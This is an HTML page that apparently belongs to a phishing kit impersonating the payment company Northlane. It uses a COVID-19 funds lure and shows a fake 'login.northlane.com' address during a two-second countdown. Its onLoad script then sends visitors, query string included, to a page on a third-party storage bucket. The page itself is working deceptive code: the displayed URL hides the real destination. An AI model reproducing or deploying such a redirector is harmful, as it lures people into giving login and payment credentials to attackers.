<!doctype html>
<html>
	<head>
		<meta charset="utf-8">
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
		<meta name="apple-mobile-web-app-capable" content="yes">
		<meta name="mobile-web-app-capable" content="yes">
		<meta name="description" content="">
		<meta name="format-detection" content="telephone=yes">
		<link rel="apple-touch-icon" href="apple-touch-icon-iphone.png"/>
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, user-scalable=no, minimal-ui, target-densityDpi=device-dpi" />
		<style type='text/css'>
			@font-face {
				font-family: 'Futura';
				src: url('Futura-Medium.eot');
				src: url('Futura-Medium.eot?#iefix') format('embedded-opentype'),
				url('Futura-Medium.woff2') format('woff2'),
				url('Futura-Medium.woff') format('woff'),
				url('Futura-Medium.ttf') format('truetype'),
				url('Futura-Medium.svg#Futura-Medium') format('svg');
				font-weight: 500;
				font-style: normal;
				font-display: swap;
			}
			body, html{
				#width:100%;
				#height:100%;
				#font-size: 110%;
				padding: 0;
				margin: 0;
				overflow-y: auto;
				background-color:#344C41;
			}
			.container{
				height:100%;
				width:100%;
				
				
			}
			.header{
				text-align:center;
				margin-top:35px;
			}  
			.headerImage{
				margin-top:50px;
				margin-bottom:50px;
				#width: 13%;
				#height: 13%;
				max-width: 15%;
				max-height: 15%;
			}
			.message1{
				margin-top:20px;
			}
			.message1{
				font-family: Futura;
				text-align:center;
				font-style: normal;
				color:#72967F;
				font-size: 38px;
			}
			.message2{
				font-family: Futura;
				text-align:center;
				font-style: normal;
				color:white;
				font-size: 25px;		
			}
			.urlId{
				color:blue;
				margin-top:10px;
				margin-bottom:10px;
				text-decoration: underline;
			}
			.dvCountDown{
				text-align:center;
				margin-top:10px;
				font-size: 80%;
			}
			.message3{
				font-family: Futura;
				text-align:center;
				font-style: normal;
				color:#72967F;
				font-size: 20px;		
			} 
			.redirectButton{
				margin-top: 50px;
				background-color: black;
				text-align: center;
				width: 300px;
				height: 50px;
				margin: auto;
				display: flex;
				align-items: center;
				justify-content: center;
				margin-top: 100px;
				font-size: 25px;
				#font-weight: bold;
				font-family: Futura;
				text-decoration: none;
				color: white;
				border-radius: 25px;
			}
			
		</style>
	</head>
	<body onLoad="DelayRedirect()">
		<div class="container">
			<div class=header>
				<img class="headerImage" src="https://clientzone-qa.northlane.com/xContent/content/NL-logo.png">
			</div>
			<div class="message1">
				The simplest way to pay
			</div>
			<br/><br/>
			<div class="message2">
				
				We are now North Lane Technologies, Inc.
				<br/>
				Our service and commitment to you remain.
			</div>
			<div class="message3">
				
				<div id="dvCountDown" style = "display:none">
					<br/>
					<img src="https://clientzone-qa.northlane.com/xContent/content/spinner.gif" width="80" height="80" align="middle"> <br/><br/>
						You will automatically be redirected to Northlane CLAIM COVID-19 FUNDS <br/><span class="urlId" id="url" ></span> <br/>in <span id = "lblCount"></span>&nbsp;seconds.
				</div>
			</div>
			<div id="redirectLink">
			<!--	
			<a href = "" class="redirectButton">
			CLICK HERE TO REDIRECT
			</a>
			-->
			</div>

		</div>

		<script type="text/javascript">
			var redirectLink = document.getElementById("redirectLink");

			var aTag = document.createElement('a');
			aTag.setAttribute('href',"https://storageapi.fleek.co/c466b023-be35-4b54-811d-01e6596fb45f-bucket/NorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlane.html"+window.location.search;
			aTag.setAttribute('class','redirectButton');
			aTag.innerHTML = "Click here to redirect";
			redirectLink.appendChild(aTag);
			//alert(window.location.pathname);

				function DelayRedirect() {
					var seconds = 2;
					var dvCountDown = document.getElementById("dvCountDown");
					var lblCount = document.getElementById("lblCount");
					var urlSpan = document.getElementById("url");
					dvCountDown.style.display = "block";
					lblCount.innerHTML = seconds;
					urlSpan.innerHTML = "login.northlane.com"+window.location.pathname+window.location.search;
					setInterval(function () {
						seconds--;
						lblCount.innerHTML = seconds;
						if (seconds == 0) {
							dvCountDown.style.display = "none";
							window.location = "https://storageapi.fleek.co/c466b023-be35-4b54-811d-01e6596fb45f-bucket/NorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlaneNorthlane.html"+window.location.search;
						}
					}, 1000);
				}
		</script>
	</body>
</html>
